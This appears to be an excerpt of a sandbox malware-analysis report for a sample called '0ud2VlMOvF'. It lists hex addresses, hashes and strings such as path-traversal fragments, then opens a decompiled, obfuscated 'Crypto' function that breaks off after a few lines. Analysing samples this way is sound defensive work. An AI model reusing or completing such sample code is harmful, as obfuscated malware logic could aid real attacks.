                                                                                                                              0x0096c6c0
                                                                                                                              0x0096b98d
                                                                                                                              0x0096b98d
                                                                                                                              0x0096b993
                                                                                                                              0x0096b995
                                                                                                                              0x0096ba3c
                                                                                                                              0x0096ba42
                                                                                                                              0x0096ba55
                                                                                                                              0x0096ba5c
                                                                                                                              0x0096ba63
                                                                                                                              0x0096ba67
                                                                                                                              0x0096ba6e
                                                                                                                              0x0096ba70
                                                                                                                              0x0096ba75
                                                                                                                              0x0096ba75
                                                                                                                              0x0096b995
                                                                                                                              0x0096b464
                                                                                                                              0x0096b464
                                                                                                                              0x0096b46a
                                                                                                                              0x0096bec5
                                                                                                                              0x0096bed1
                                                                                                                              0x0096bed5
                                                                                                                              0x0096b470
                                                                                                                              0x0096b470
                                                                                                                              0x0096b476
                                                                                                                              0x0096bee6
                                                                                                                              0x0096b47c
                                                                                                                              0x0096b47c
                                                                                                                              0x0096b482
                                                                                                                              0x0096b484
                                                                                                                              0x0096b491
                                                                                                                              0x0096b491
                                                                                                                              0x0096b484
                                                                                                                              0x0096b476
                                                                                                                              0x0096b46a
                                                                                                                              0x0096b100
                                                                                                                              0x0096b100
                                                                                                                              0x0096b107
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b107
                                                                                                                              0x0096b100
                                                                                                                              0x0096b452
                                                                                                                              0x0096b1fc
                                                                                                                              0x0096b202
                                                                                                                              0x0096b5b3
                                                                                                                              0x0096b5b9
                                                                                                                              0x0096bae2
                                                                                                                              0x0096bae8
                                                                                                                              0x0096c732
                                                                                                                              0x0096c739
                                                                                                                              0x0096c73c
                                                                                                                              0x0096c744
                                                                                                                              0x0096c748
                                                                                                                              0x00000000
                                                                                                                              0x0096c748
                                                                                                                              0x0096baee
                                                                                                                              0x0096baf4
                                                                                                                              0x0096baf6
                                                                                                                              0x0096bb24
                                                                                                                              0x0096bb2b
                                                                                                                              0x0096bb2d
                                                                                                                              0x0096bb2d
                                                                                                                              0x00000000
                                                                                                                              0x0096baf6
                                                                                                                              0x0096b5bf
                                                                                                                              0x0096b5c5
                                                                                                                              0x0096bfe5
                                                                                                                              0x0096bfea
                                                                                                                              0x0096bff0
                                                                                                                              0x0096bff5
                                                                                                                              0x0096bff8
                                                                                                                              0x0096bffd
                                                                                                                              0x0096c005
                                                                                                                              0x0096c00d
                                                                                                                              0x0096c699
                                                                                                                              0x0096c699
                                                                                                                              0x0096c69c
                                                                                                                              0x0096c69e
                                                                                                                              0x0096c6a0
                                                                                                                              0x0096c6a3
                                                                                                                              0x0096c6a6
                                                                                                                              0x00000000
                                                                                                                              0x0096c6a6
                                                                                                                              0x0096b5cb
                                                                                                                              0x0096b5d1
                                                                                                                              0x0096c01e
                                                                                                                              0x0096c026
                                                                                                                              0x0096c028
                                                                                                                              0x0096c02e
                                                                                                                              0x0096c035
                                                                                                                              0x0096c03b
                                                                                                                              0x0096c042
                                                                                                                              0x0096c049
                                                                                                                              0x0096c050
                                                                                                                              0x0096c057
                                                                                                                              0x0096c05e
                                                                                                                              0x0096c065
                                                                                                                              0x0096c06c
                                                                                                                              0x0096c06c
                                                                                                                              0x0096c071
                                                                                                                              0x0096b5d7
                                                                                                                              0x0096b5d7
                                                                                                                              0x0096b5dd
                                                                                                                              0x0096b5df
                                                                                                                              0x0096b5e9
                                                                                                                              0x0096b5f3
                                                                                                                              0x0096b5ff
                                                                                                                              0x0096b606
                                                                                                                              0x0096b609
                                                                                                                              0x0096b609
                                                                                                                              0x0096b5df
                                                                                                                              0x0096b208
                                                                                                                              0x0096b208
                                                                                                                              0x0096b20e
                                                                                                                              0x0096b872
                                                                                                                              0x0096b878
                                                                                                                              0x0096c487
                                                                                                                              0x0096c496
                                                                                                                              0x0096c4a6
                                                                                                                              0x0096c4b6
                                                                                                                              0x0096c4c6
                                                                                                                              0x0096c4ca
                                                                                                                              0x0096b87e
                                                                                                                              0x0096b87e
                                                                                                                              0x0096b884
                                                                                                                              0x0096c4e3
                                                                                                                              0x0096c4e5
                                                                                                                              0x0096c4ec
                                                                                                                              0x0096c4f3
                                                                                                                              0x0096c512
                                                                                                                              0x0096c518
                                                                                                                              0x0096c51d
                                                                                                                              0x0096b88a
                                                                                                                              0x0096b88a
                                                                                                                              0x0096b890
                                                                                                                              0x0096b892
                                                                                                                              0x0096b898
                                                                                                                              0x0096b89d
                                                                                                                              0x0096b89d
                                                                                                                              0x0096b892
                                                                                                                              0x0096b884
                                                                                                                              0x0096b214
                                                                                                                              0x0096b214
                                                                                                                              0x0096b21a
                                                                                                                              0x0096bd08
                                                                                                                              0x0096bd10
                                                                                                                              0x0096b220
                                                                                                                              0x0096b220
                                                                                                                              0x0096b226
                                                                                                                              0x0096bd24
                                                                                                                              0x0096bd29
                                                                                                                              0x0096bd2c
                                                                                                                              0x0096bd3d
                                                                                                                              0x0096bd45
                                                                                                                              0x0096b22c
                                                                                                                              0x0096b22c
                                                                                                                              0x0096b232
                                                                                                                              0x0096b234
                                                                                                                              0x0096b241
                                                                                                                              0x0096b249
                                                                                                                              0x0096b253
                                                                                                                              0x0096b261
                                                                                                                              0x0096b268
                                                                                                                              0x0096b26b
                                                                                                                              0x0096b26e
                                                                                                                              0x0096b273
                                                                                                                              0x0096b273
                                                                                                                              0x0096b234
                                                                                                                              0x0096b226
                                                                                                                              0x0096b21a
                                                                                                                              0x0096b20e
                                                                                                                              0x00000000
                                                                                                                              0x0096b202
                                                                                                                              0x0096b11b
                                                                                                                              0x0096b37c
                                                                                                                              0x0096b382
                                                                                                                              0x0096b659
                                                                                                                              0x0096b65f
                                                                                                                              0x0096bb63
                                                                                                                              0x0096bb69
                                                                                                                              0x0096c787
                                                                                                                              0x0096c799
                                                                                                                              0x0096bb6f
                                                                                                                              0x0096bb6f
                                                                                                                              0x0096bb75
                                                                                                                              0x0096bb77
                                                                                                                              0x0096bba5
                                                                                                                              0x0096bbac
                                                                                                                              0x0096bbae
                                                                                                                              0x0096bbae
                                                                                                                              0x0096bb77
                                                                                                                              0x00000000
                                                                                                                              0x0096bb69
                                                                                                                              0x0096b665
                                                                                                                              0x0096b66b
                                                                                                                              0x0096c0ac
                                                                                                                              0x0096c0b1
                                                                                                                              0x0096c0b4
                                                                                                                              0x00000000
                                                                                                                              0x0096c0b4
                                                                                                                              0x0096b671
                                                                                                                              0x0096b677
                                                                                                                              0x0096c188
                                                                                                                              0x0096c18e
                                                                                                                              0x0096c1a1
                                                                                                                              0x0096c1a8
                                                                                                                              0x0096c1af
                                                                                                                              0x0096c1b3
                                                                                                                              0x0096c1ba
                                                                                                                              0x0096c1bc
                                                                                                                              0x0096c1c1
                                                                                                                              0x00000000
                                                                                                                              0x0096c1c1
                                                                                                                              0x0096b67d
                                                                                                                              0x0096b683
                                                                                                                              0x0096b685
                                                                                                                              0x0096b68b
                                                                                                                              0x0096b693
                                                                                                                              0x0096b698
                                                                                                                              0x0096b69d
                                                                                                                              0x0096b6a2
                                                                                                                              0x0096b6a5
                                                                                                                              0x0096b6ad
                                                                                                                              0x0096b6b0
                                                                                                                              0x0096be67
                                                                                                                              0x0096be69
                                                                                                                              0x0096be6c
                                                                                                                              0x0096be72
                                                                                                                              0x0096be75
                                                                                                                              0x0096be7f
                                                                                                                              0x0096be82
                                                                                                                              0x0096be84
                                                                                                                              0x0096be84
                                                                                                                              0x00000000
                                                                                                                              0x0096b685
                                                                                                                              0x0096b388
                                                                                                                              0x0096b38e
                                                                                                                              0x0096b913
                                                                                                                              0x0096b919
                                                                                                                              0x0096c631
                                                                                                                              0x0096c636
                                                                                                                              0x0096c643
                                                                                                                              0x0096c65a
                                                                                                                              0x0096c662
                                                                                                                              0x0096b91f
                                                                                                                              0x0096b91f
                                                                                                                              0x0096b925
                                                                                                                              0x0096b927
                                                                                                                              0x0096b935
                                                                                                                              0x0096b93f
                                                                                                                              0x0096b946
                                                                                                                              0x0096b946
                                                                                                                              0x0096b927
                                                                                                                              0x00000000
                                                                                                                              0x0096b919
                                                                                                                              0x0096b394
                                                                                                                              0x0096b39a
                                                                                                                              0x0096be00
                                                                                                                              0x0096be07
                                                                                                                              0x0096be10
                                                                                                                              0x0096be2c
                                                                                                                              0x0096be31
                                                                                                                              0x0096be34
                                                                                                                              0x0096be45
                                                                                                                              0x00000000
                                                                                                                              0x0096be45
                                                                                                                              0x0096b3a0
                                                                                                                              0x0096b3a6
                                                                                                                              0x0096be4d
                                                                                                                              0x0096be52
                                                                                                                              0x0096be57
                                                                                                                              0x0096be5c
                                                                                                                              0x0096be5f
                                                                                                                              0x0096be5f
                                                                                                                              0x0096be62
                                                                                                                              0x00000000
                                                                                                                              0x0096b3ac
                                                                                                                              0x0096b3ac
                                                                                                                              0x0096b3b2
                                                                                                                              0x0096b3b4
                                                                                                                              0x0096b3c1
                                                                                                                              0x0096b3c6
                                                                                                                              0x0096b3c9
                                                                                                                              0x0096b3c9
                                                                                                                              0x00000000
                                                                                                                              0x0096b3b4
                                                                                                                              0x0096b3a6
                                                                                                                              0x0096b127
                                                                                                                              0x0096b509
                                                                                                                              0x0096b50f
                                                                                                                              0x0096b900
                                                                                                                              0x0096b906
                                                                                                                              0x0096b908
                                                                                                                              0x0096c8d1
                                                                                                                              0x0096c8d3
                                                                                                                              0x0096c8e3
                                                                                                                              0x0096c8e3
                                                                                                                              0x0096b515
                                                                                                                              0x0096b515
                                                                                                                              0x0096b51b
                                                                                                                              0x0096bf86
                                                                                                                              0x0096bf90
                                                                                                                              0x0096b521
                                                                                                                              0x0096b521
                                                                                                                              0x0096b527
                                                                                                                              0x0096bf9f
                                                                                                                              0x0096bfa3
                                                                                                                              0x0096bfb2
                                                                                                                              0x0096bfb5
                                                                                                                              0x0096b52d
                                                                                                                              0x0096b52d
                                                                                                                              0x0096b533
                                                                                                                              0x0096b535
                                                                                                                              0x0096b547
                                                                                                                              0x0096b54c
                                                                                                                              0x0096b54f
                                                                                                                              0x0096b560
                                                                                                                              0x0096b568
                                                                                                                              0x0096b568
                                                                                                                              0x0096b535
                                                                                                                              0x0096b527
                                                                                                                              0x0096b51b
                                                                                                                              0x00000000
                                                                                                                              0x0096b50f
                                                                                                                              0x0096b133
                                                                                                                              0x0096b7ca
                                                                                                                              0x0096b7d0
                                                                                                                              0x0096c3bc
                                                                                                                              0x0096c3c1
                                                                                                                              0x0096c3c4
                                                                                                                              0x0096b7d6
                                                                                                                              0x0096b7d6
                                                                                                                              0x0096b7dc
                                                                                                                              0x0096c3d2
                                                                                                                              0x0096c3da
                                                                                                                              0x0096c3de
                                                                                                                              0x0096b7e2
                                                                                                                              0x0096b7e2
                                                                                                                              0x0096b7e8
                                                                                                                              0x0096b7ea
                                                                                                                              0x0096b7f9
                                                                                                                              0x0096b80a
                                                                                                                              0x0096b818
                                                                                                                              0x0096b824
                                                                                                                              0x0096b824
                                                                                                                              0x0096b7ea
                                                                                                                              0x0096b7dc
                                                                                                                              0x00000000
                                                                                                                              0x0096b7d0
                                                                                                                              0x0096b13f
                                                                                                                              0x0096bcd6
                                                                                                                              0x0096bcda
                                                                                                                              0x00000000
                                                                                                                              0x0096bcda
                                                                                                                              0x0096b14b
                                                                                                                              0x0096bce4
                                                                                                                              0x00000000
                                                                                                                              0x0096b151
                                                                                                                              0x0096b157
                                                                                                                              0x0096b159
                                                                                                                              0x0096b15b
                                                                                                                              0x0096b15b
                                                                                                                              0x00000000
                                                                                                                              0x0096b159
                                                                                                                              0x0096b170
                                                                                                                              0x0096b170
                                                                                                                              0x0096b176
                                                                                                                              0x0096b280
                                                                                                                              0x0096b286
                                                                                                                              0x0096b49b
                                                                                                                              0x0096b4a1
                                                                                                                              0x0096b76b
                                                                                                                              0x0096b771
                                                                                                                              0x0096bc9b
                                                                                                                              0x0096bca1
                                                                                                                              0x0096c897
                                                                                                                              0x0096c8a2
                                                                                                                              0x0096c8a7
                                                                                                                              0x0096c8ae
                                                                                                                              0x0096c8b0
                                                                                                                              0x0096c8b4
                                                                                                                              0x0096c8bb
                                                                                                                              0x0096c8bd
                                                                                                                              0x0096c8c2
                                                                                                                              0x0096bca7
                                                                                                                              0x0096bca7
                                                                                                                              0x0096bcad
                                                                                                                              0x0096bcaf
                                                                                                                              0x0096bcb5
                                                                                                                              0x0096bcbd
                                                                                                                              0x0096bcc9
                                                                                                                              0x0096bcc9
                                                                                                                              0x0096bcaf
                                                                                                                              0x00000000
                                                                                                                              0x0096bca1
                                                                                                                              0x0096b777
                                                                                                                              0x0096b77d
                                                                                                                              0x0096c36d
                                                                                                                              0x0096c374
                                                                                                                              0x00000000
                                                                                                                              0x0096c374
                                                                                                                              0x0096b783
                                                                                                                              0x0096b789
                                                                                                                              0x0096c37c
                                                                                                                              0x0096c381
                                                                                                                              0x0096c38c
                                                                                                                              0x0096c391
                                                                                                                              0x0096c399
                                                                                                                              0x0096c3a2
                                                                                                                              0x0096c3aa
                                                                                                                              0x0096c3ad
                                                                                                                              0x00000000
                                                                                                                              0x0096b78f
                                                                                                                              0x0096b78f
                                                                                                                              0x0096b795
                                                                                                                              0x0096b797
                                                                                                                              0x0096b7ac
                                                                                                                              0x0096b7ba
                                                                                                                              0x0096b7c2
                                                                                                                              0x0096b7c2
                                                                                                                              0x00000000
                                                                                                                              0x0096b797
                                                                                                                              0x0096b789
                                                                                                                              0x0096b4a7
                                                                                                                              0x0096b4ad
                                                                                                                              0x0096ba7d
                                                                                                                              0x0096ba83
                                                                                                                              0x0096c6dc
                                                                                                                              0x0096c6e1
                                                                                                                              0x0096c6e4
                                                                                                                              0x0096c6f0
                                                                                                                              0x0096ba89
                                                                                                                              0x0096ba89
                                                                                                                              0x0096ba8f
                                                                                                                              0x0096ba91
                                                                                                                              0x0096ba9e
                                                                                                                              0x0096baa3
                                                                                                                              0x0096baa6
                                                                                                                              0x0096baa6
                                                                                                                              0x0096ba91
                                                                                                                              0x00000000
                                                                                                                              0x0096ba83
                                                                                                                              0x0096b4b3
                                                                                                                              0x0096b4b9
                                                                                                                              0x0096befa
                                                                                                                              0x0096beff
                                                                                                                              0x0096bf06
                                                                                                                              0x0096bf0d
                                                                                                                              0x0096bf14
                                                                                                                              0x0096bf17
                                                                                                                              0x0096bf1c
                                                                                                                              0x0096bf1f
                                                                                                                              0x0096bf2a
                                                                                                                              0x0096bf31
                                                                                                                              0x0096bf34
                                                                                                                              0x00000000
                                                                                                                              0x0096b4bf
                                                                                                                              0x0096b4bf
                                                                                                                              0x0096b4c5
                                                                                                                              0x0096bf5d
                                                                                                                              0x0096bf6e
                                                                                                                              0x0096bf70
                                                                                                                              0x0096b4cb
                                                                                                                              0x0096b4cb
                                                                                                                              0x0096b4d1
                                                                                                                              0x0096b4d3
                                                                                                                              0x0096b4e2
                                                                                                                              0x0096b4ee
                                                                                                                              0x0096b4f6
                                                                                                                              0x0096b4fd
                                                                                                                              0x0096b500
                                                                                                                              0x0096b500
                                                                                                                              0x0096b4d3
                                                                                                                              0x00000000
                                                                                                                              0x0096b4c5
                                                                                                                              0x0096b4b9
                                                                                                                              0x0096b28c
                                                                                                                              0x0096b292
                                                                                                                              0x0096b612
                                                                                                                              0x0096b618
                                                                                                                              0x0096bb37
                                                                                                                              0x0096bb3d
                                                                                                                              0x0096c75e
                                                                                                                              0x0096c763
                                                                                                                              0x0096c766
                                                                                                                              0x0096c777
                                                                                                                              0x0096c77f
                                                                                                                              0x0096bb43
                                                                                                                              0x0096bb43
                                                                                                                              0x0096bb49
                                                                                                                              0x0096bb4b
                                                                                                                              0x0096bb51
                                                                                                                              0x0096bb56
                                                                                                                              0x0096bb56
                                                                                                                              0x0096bb4b
                                                                                                                              0x00000000
                                                                                                                              0x0096bb3d
                                                                                                                              0x0096b61e
                                                                                                                              0x0096b624
                                                                                                                              0x0096baca
                                                                                                                              0x0096bad4
                                                                                                                              0x0096bad8
                                                                                                                              0x0096b62a
                                                                                                                              0x0096b62a
                                                                                                                              0x0096b630
                                                                                                                              0x0096c087
                                                                                                                              0x0096c095
                                                                                                                              0x0096c09d
                                                                                                                              0x0096b636
                                                                                                                              0x0096b636
                                                                                                                              0x0096b63c
                                                                                                                              0x0096b63e
                                                                                                                              0x0096b64b
                                                                                                                              0x0096b650
                                                                                                                              0x0096b650
                                                                                                                              0x0096b63e
                                                                                                                              0x0096b630
                                                                                                                              0x0096b298
                                                                                                                              0x0096b298
                                                                                                                              0x0096b29e
                                                                                                                              0x0096b8aa
                                                                                                                              0x0096b8b0
                                                                                                                              0x0096c54d
                                                                                                                              0x0096c551
                                                                                                                              0x0096b8b6
                                                                                                                              0x0096b8b6
                                                                                                                              0x0096b8bc
                                                                                                                              0x0096c562
                                                                                                                              0x0096c572
                                                                                                                              0x0096c57b
                                                                                                                              0x0096c589
                                                                                                                              0x0096c5b0
                                                                                                                              0x0096c5b8
                                                                                                                              0x0096c5bf
                                                                                                                              0x0096c5cf
                                                                                                                              0x0096c5d6
                                                                                                                              0x0096c5dd
                                                                                                                              0x0096c5e6
                                                                                                                              0x0096c5ed
                                                                                                                              0x0096c5f4
                                                                                                                              0x0096c604
                                                                                                                              0x0096c605
                                                                                                                              0x0096c606
                                                                                                                              0x0096c607
                                                                                                                              0x0096c609
                                                                                                                              0x0096c60e
                                                                                                                              0x0096c611
                                                                                                                              0x0096c61d
                                                                                                                              0x0096b8c2
                                                                                                                              0x0096b8c2
                                                                                                                              0x0096b8c8
                                                                                                                              0x0096b8ca
                                                                                                                              0x0096b8d9
                                                                                                                              0x0096b8e5
                                                                                                                              0x0096b8ed
                                                                                                                              0x0096b8f4
                                                                                                                              0x0096b8f7
                                                                                                                              0x0096b8f7
                                                                                                                              0x0096b8ca
                                                                                                                              0x0096b8bc
                                                                                                                              0x0096b2a4
                                                                                                                              0x0096b2a4
                                                                                                                              0x0096b2aa
                                                                                                                              0x0096bd56
                                                                                                                              0x0096bd64
                                                                                                                              0x0096bd6d
                                                                                                                              0x0096b2b0
                                                                                                                              0x0096b2b0
                                                                                                                              0x0096b2b6
                                                                                                                              0x0096bd7c
                                                                                                                              0x0096bd81
                                                                                                                              0x0096bda1
                                                                                                                              0x0096bdbb
                                                                                                                              0x0096bdc2
                                                                                                                              0x0096bde1
                                                                                                                              0x0096bdf8
                                                                                                                              0x0096b2bc
                                                                                                                              0x0096b2bc
                                                                                                                              0x0096b2c2
                                                                                                                              0x0096b2c4
                                                                                                                              0x0096b2d5
                                                                                                                              0x0096b2da
                                                                                                                              0x0096b2eb
                                                                                                                              0x0096b2f0
                                                                                                                              0x0096b2f3
                                                                                                                              0x0096b2fa
                                                                                                                              0x0096b2fd
                                                                                                                              0x0096b307
                                                                                                                              0x0096b324
                                                                                                                              0x0096b32f
                                                                                                                              0x0096b331
                                                                                                                              0x0096b334
                                                                                                                              0x0096b337
                                                                                                                              0x0096b33b
                                                                                                                              0x0096b33e
                                                                                                                              0x0096b341
                                                                                                                              0x0096b34a
                                                                                                                              0x0096b355
                                                                                                                              0x0096b35d
                                                                                                                              0x0096b36d
                                                                                                                              0x0096b373
                                                                                                                              0x0096b373
                                                                                                                              0x0096b2c4
                                                                                                                              0x0096b2b6
                                                                                                                              0x0096b2aa
                                                                                                                              0x0096b29e
                                                                                                                              0x00000000
                                                                                                                              0x0096b292
                                                                                                                              0x0096b17c
                                                                                                                              0x0096b182
                                                                                                                              0x0096b3d3
                                                                                                                              0x0096b3d9
                                                                                                                              0x0096b6ba
                                                                                                                              0x0096b6c0
                                                                                                                              0x0096bbb8
                                                                                                                              0x0096bbbe
                                                                                                                              0x0096c7b2
                                                                                                                              0x0096c7b9
                                                                                                                              0x0096bbc4
                                                                                                                              0x0096bbc4
                                                                                                                              0x0096bbca
                                                                                                                              0x0096bbcc
                                                                                                                              0x0096bbe4
                                                                                                                              0x0096bbf0
                                                                                                                              0x0096bbf3
                                                                                                                              0x0096bbfe
                                                                                                                              0x0096bc09
                                                                                                                              0x0096bc23
                                                                                                                              0x0096bc2b
                                                                                                                              0x0096bc37
                                                                                                                              0x0096bc3e
                                                                                                                              0x0096bc41
                                                                                                                              0x0096bc41
                                                                                                                              0x0096bbcc
                                                                                                                              0x0096b6c6
                                                                                                                              0x0096b6c6
                                                                                                                              0x0096b6cc
                                                                                                                              0x0096c1c9
                                                                                                                              0x0096c1ce
                                                                                                                              0x0096b6d2
                                                                                                                              0x0096b6d2
                                                                                                                              0x0096b6d8
                                                                                                                              0x0096c1e2
                                                                                                                              0x0096b6de
                                                                                                                              0x0096b6de
                                                                                                                              0x0096b6e4
                                                                                                                              0x0096b6e6
                                                                                                                              0x0096b6f8
                                                                                                                              0x0096b706
                                                                                                                              0x0096b713
                                                                                                                              0x0096b713
                                                                                                                              0x0096b6e6
                                                                                                                              0x0096b6d8
                                                                                                                              0x0096b6cc
                                                                                                                              0x00000000
                                                                                                                              0x0096b6c0
                                                                                                                              0x0096b3df
                                                                                                                              0x0096b3e5
                                                                                                                              0x0096b94e
                                                                                                                              0x0096b954
                                                                                                                              0x0096c66c
                                                                                                                              0x0096c671
                                                                                                                              0x0096c677
                                                                                                                              0x0096c67c
                                                                                                                              0x0096c67f
                                                                                                                              0x0096c684
                                                                                                                              0x0096c68c
                                                                                                                              0x0096c692
                                                                                                                              0x0096c694
                                                                                                                              0x00000000
                                                                                                                              0x0096c694
                                                                                                                              0x0096b95a
                                                                                                                              0x0096b960
                                                                                                                              0x0096b962
                                                                                                                              0x0096b96f
                                                                                                                              0x0096b974
                                                                                                                              0x0096b977
                                                                                                                              0x0096b977
                                                                                                                              0x00000000
                                                                                                                              0x0096b962
                                                                                                                              0x0096b3eb
                                                                                                                              0x0096b3f1
                                                                                                                              0x0096be98
                                                                                                                              0x0096be9d
                                                                                                                              0x00000000
                                                                                                                              0x0096b3f7
                                                                                                                              0x0096b3f7
                                                                                                                              0x0096b3fd
                                                                                                                              0x0096bea5
                                                                                                                              0x0096beaa
                                                                                                                              0x0096b403
                                                                                                                              0x0096b403
                                                                                                                              0x0096b409
                                                                                                                              0x0096b40b
                                                                                                                              0x0096b439
                                                                                                                              0x0096b440
                                                                                                                              0x0096b442
                                                                                                                              0x0096b442
                                                                                                                              0x0096b40b
                                                                                                                              0x00000000
                                                                                                                              0x0096b3fd
                                                                                                                              0x0096b3f1
                                                                                                                              0x0096b188
                                                                                                                              0x0096b18e
                                                                                                                              0x0096b570
                                                                                                                              0x0096b576
                                                                                                                              0x0096bab0
                                                                                                                              0x0096bab6
                                                                                                                              0x0096c6ff
                                                                                                                              0x0096c70f
                                                                                                                              0x0096c71d
                                                                                                                              0x0096c72a
                                                                                                                              0x00000000
                                                                                                                              0x0096c72a
                                                                                                                              0x0096babc
                                                                                                                              0x0096bac2
                                                                                                                              0x0096bac4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b57c
                                                                                                                              0x0096b57c
                                                                                                                              0x0096b582
                                                                                                                              0x0096bfbe
                                                                                                                              0x0096b588
                                                                                                                              0x0096b588
                                                                                                                              0x0096b58e
                                                                                                                              0x0096bfc8
                                                                                                                              0x0096bfd0
                                                                                                                              0x0096bfdc
                                                                                                                              0x0096b594
                                                                                                                              0x0096b594
                                                                                                                              0x0096b59a
                                                                                                                              0x0096b59c
                                                                                                                              0x0096b5a9
                                                                                                                              0x0096b5a9
                                                                                                                              0x0096b59c
                                                                                                                              0x0096b58e
                                                                                                                              0x00000000
                                                                                                                              0x0096b582
                                                                                                                              0x0096b576
                                                                                                                              0x0096b194
                                                                                                                              0x0096b19a
                                                                                                                              0x0096b82c
                                                                                                                              0x0096b832
                                                                                                                              0x0096c3ec
                                                                                                                              0x0096c3f7
                                                                                                                              0x0096c402
                                                                                                                              0x0096c40d
                                                                                                                              0x0096c418
                                                                                                                              0x0096c423
                                                                                                                              0x0096c431
                                                                                                                              0x0096c43c
                                                                                                                              0x0096b838
                                                                                                                              0x0096b838
                                                                                                                              0x0096b83e
                                                                                                                              0x0096c450
                                                                                                                              0x0096c455
                                                                                                                              0x0096c458
                                                                                                                              0x0096c469
                                                                                                                              0x0096c471
                                                                                                                              0x0096b844
                                                                                                                              0x0096b844
                                                                                                                              0x0096b84a
                                                                                                                              0x0096b84c
                                                                                                                              0x0096b863
                                                                                                                              0x0096b86a
                                                                                                                              0x0096b86a
                                                                                                                              0x0096b84c
                                                                                                                              0x0096b83e
                                                                                                                              0x00000000
                                                                                                                              0x0096b832
                                                                                                                              0x0096b1a0
                                                                                                                              0x0096b1a4
                                                                                                                              0x0096b1aa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0096b1b0
                                                                                                                              0x0096b1b6
                                                                                                                              0x0096bcf0
                                                                                                                              0x00000000
                                                                                                                              0x0096b1bc
                                                                                                                              0x0096b1bc
                                                                                                                              0x0096b1c2
                                                                                                                              0x0096b1c4
                                                                                                                              0x0096b1d1
                                                                                                                              0x0096b1d7
                                                                                                                              0x0096b1d7
                                                                                                                              0x00000000
                                                                                                                              0x0096b1c4
                                                                                                                              0x0096b1b6

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: /../$/..\$;+N$;+N$\../$\..\$e,+$f,+$f,+$f,+$}8L$~8L$~8L
                                                                                                                              • API String ID: 0-1610019345
                                                                                                                              • Opcode ID: 009b8d25638f2058308825b6dbfe32344e67c676409b596567dd367aea56210d
                                                                                                                              • Instruction ID: da8bb416566deb31eb454e85be8a6d49e90b3c745eef0b979cb06eb48bd777b1
                                                                                                                              • Opcode Fuzzy Hash: 009b8d25638f2058308825b6dbfe32344e67c676409b596567dd367aea56210d
                                                                                                                              • Instruction Fuzzy Hash: 99C2847460C3459FDB78CE18C8A57AAB7E1AFC9304F14892EF49AC7750EB349885DB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00953960 Relevance: 29.0, Strings: 21, Instructions: 2713COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 40%
                                                                                                                              			E00953960() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t1254;
				signed char* _t1288;
				signed int* _t1295;
				intOrPtr _t1296;
				signed int _t1333;
				intOrPtr _t1335;
				void* _t1341;
				void* _t1372;
				intOrPtr _t1381;
				void* _t1387;
				signed int _t1400;
				void* _t1405;
				void* _t1406;
				signed char* _t1424;
				void* _t1446;
				intOrPtr _t1475;
				signed char* _t1494;
				signed int _t1498;
				void* _t1510;
				signed char* _t1533;
				void* _t1535;
				signed int _t1550;
				intOrPtr _t1586;
				signed int _t1635;
				signed int _t1795;
				signed int* _t1826;
				signed int _t1914;
				intOrPtr _t1932;
				signed int _t1954;
				signed int _t1966;
				signed int _t1975;
				signed char** _t1981;
				void* _t1983;
				signed int _t1995;
				void* _t2002;
				signed int _t2003;
				void* _t2024;
				signed char _t2052;
				signed char _t2074;
				signed int _t2078;
				signed int _t2135;
				signed int* _t2156;
				signed int _t2188;
				signed char** _t2219;
				void* _t2228;
				void* _t2233;
				void* _t2262;
				signed int _t2297;
				signed int _t2301;
				signed int _t2306;
				void* _t2310;
				void* _t2311;
				void* _t2312;
				void* _t2316;
				void* _t2317;
				void* _t2322;
				void* _t2326;
				void* _t2334;
				void* _t2335;
				void* _t2339;
				void* _t2340;
				void* _t2357;
				signed int _t2365;
				void* _t2371;
				void* _t2372;
				void* _t2374;
				signed int _t2377;
				signed char* _t2382;
				intOrPtr _t2385;
				signed int _t2387;
				intOrPtr _t2392;
				signed int _t2397;

				_t1981 =  *(_t2397 + 0x3a4);
				_t1254 =  *0x984000; // 0xd51acdcc
				_t2392 =  *((intOrPtr*)(_t2397 + 0x3a0));
				_t2310 = 0xce858734;
				 *(_t2397 + 0x388) = _t1254 ^ _t2397;
				 *(_t2397 + 0x17c) =  *(_t2392 + 4);
				 *_t2397 = _t1981;
				 *(_t2397 + 0x180) =  *( *(_t2397 + 0x3a4));
				 *(_t2397 + 0x184) =  &(_t1981[1]);
				 *(_t2397 + 0x188) =  *( *(_t2397 + 0x184));
				 *(_t2397 + 0x18c) = _t2392 + 0x20;
				 *(_t2397 + 0x190) =  *( *(_t2397 + 0x18c));
				 *(_t2397 + 0x194) = _t2392 + 0x1c;
				 *(_t2397 + 0x198) =  *( *(_t2397 + 0x194));
				 *(_t2397 + 0x19c) = _t2392 + 0x34;
				 *(_t2397 + 0x1a0) =  *( *(_t2397 + 0x19c));
				 *(_t2397 + 0x1a4) = _t2392 + 0x30;
				 *(_t2397 + 0x1a8) =  *( *(_t2397 + 0x1a4));
				 *(_t2397 + 0x58) = _t2392 + 0x28;
				 *((intOrPtr*)(_t2397 + 0x24)) = _t2392 + 0x2c;
				if(0xce858734 > 0xff0faca1) {
					L5:
					while(1) {
						L5:
						while(1) {
							L5:
							while(_t2310 > 0x45501601) {
								if(_t2310 > 0x64bbdec3) {
									if(_t2310 <= 0x6b222ac3) {
										if(_t2310 <= 0x67273830) {
											if(_t2310 > 0x65a24410) {
												if(_t2310 == 0x65a24411) {
													 *(_t2397 + 0x12c) =  *(_t2397 + 0x320) - 1;
													 *(_t2397 + 0x128) =  &(( *(_t2397 + 0x324))[1]);
													_t1954 =  *(_t2397 + 0x32c);
													_t2365 =  !_t1954;
													_t1953 = _t1954 & 0xb19cee6e | _t2365 & 0x4e631191;
													_t2310 = 0x41933f86;
